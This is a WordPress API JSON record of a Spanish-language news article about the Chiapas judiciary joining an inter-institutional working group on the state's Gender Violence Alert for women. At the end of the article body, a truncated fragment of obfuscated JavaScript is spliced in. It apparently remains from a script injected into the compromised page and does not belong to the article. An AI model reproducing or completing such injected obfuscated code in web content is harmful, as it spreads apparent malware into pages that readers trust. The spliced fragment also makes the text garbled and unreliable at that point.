{"id":23668,"date":"2025-08-25T06:00:30","date_gmt":"2025-08-25T06:00:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=23668"},"modified":"2025-08-25T06:00:31","modified_gmt":"2025-08-25T06:00:31","slug":"poder-judicial-de-chiapas-participa-en-la-segunda-mesa-de-trabajo-interinstitucional-de-sistematizacion-de-acciones-avgm","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=23668","title":{"rendered":"Poder Judicial de Chiapas participa en la Segunda Mesa de Trabajo Interinstitucional de Sistematizaci\u00f3n de Acciones AVGM"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"815\" data-id=\"23669\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295854-1024x815.jpg\" alt=\"\" class=\"wp-image-23669\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295854-1024x815.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295854-300x239.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295854-768x611.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295854.jpg 1158w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" data-id=\"23670\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295852-1024x768.jpg\" alt=\"\" class=\"wp-image-23670\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295852-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295852-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295852-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/08\/1000295852.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>24 de agosto del 2025. En el marco del compromiso permanente para garantizar los derechos humanos y atender con responsabilidad las acciones de prevenci\u00f3n, atenci\u00f3n y erradicaci\u00f3n de la violencia contra las mujeres, el Poder Judicial del Estado de Chiapas, que preside el magistrado presidente Juan Carlos Moreno Guill\u00e9n, a trav\u00e9s de la Direcci\u00f3n de Igualdad de G\u00e9nero y Derechos Humanos, particip\u00f3 en la Segunda Mesa de Trabajo Interinstitucional de Sistematizaci\u00f3n de Acciones de la Alerta de Violencia de G\u00e9nero contra las Mujeres (AVGM).<\/p>\n\n\n\n<p>Con la representaci\u00f3n de la titular de esta \u00e1rea, Margarita Esther L\u00f3pez Morales, la casa de la justicia refrend\u00f3 su compromiso en la construcci\u00f3n de una pol\u00edtica p\u00fablica s\u00f3lida que permita homologar, concentrar y visibilizar los avances, resultados y buenas pr\u00e1cticas implementadas en la entidad. Dichos esfuerzos conjuntos, tienen como finalidad consolidar en Chiapas, estrategias con un enfoque integral para la atenci\u00f3n de los municipios de la AVGM.<\/p>\n\n\n\n<p>Este encuentro, celebrado en la Sala de Juntas Rosario Castellanos de la Secretar\u00eda de la Mujer e Igualdad de G\u00e9nero, y convocado por la Subsecretar\u00eda de Igualdad e Inclusi\u00f3n de G\u00e9nero; reuni\u00f3 a representantes de instituciones clave, entre ellas a la Unidad de Igualdad de G\u00e9nero de la Secretar\u00eda de Gobierno, de la Secretar\u00eda de Seguridad y Protecci\u00f3n Ciudadana, as\u00ed como de la Comisi\u00f3n Estatal de los Derechos Humanos.<\/p>\n\n\n\n<p>Durante la mesa de trabajo se dio seguimiento al informe de acciones de la AVGM, privilegiando el di\u00e1logo interinstitucional para aterrizar ejercicios estrat\u00e9gicos que fortalezcan la coordinaci\u00f3n y permitan articular nuevas alianzas en beneficio de las mujeres chiapanecas.<\/p>\n\n\n\n<p>Con estas acciones, el Poder Judicial del Estado de Chiapas reafirma su compromiso con la prevenci\u00f3n de la violencia y la consolidaci\u00f3n de una justicia con rostro humano, donde la justicia es la paz.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 24 de agosto del 2025. En el marco del compromiso permanente para garantizar los derechos humanos y atender con responsabilidad las acciones de prevenci\u00f3n, atenci\u00f3n y erradicaci\u00f3n de la violencia contra las mujeres, el Poder Judicial del Estado de Chiapas, que preside el magistrado presidente Juan Carlos Moreno Guill\u00e9n, a trav\u00e9s de la Direcci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":23669,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-23668","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23668","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23668"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23668\/revisions"}],"predecessor-version":[{"id":23671,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/23668\/revisions\/23671"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/23669"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23668"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23668"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23668"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}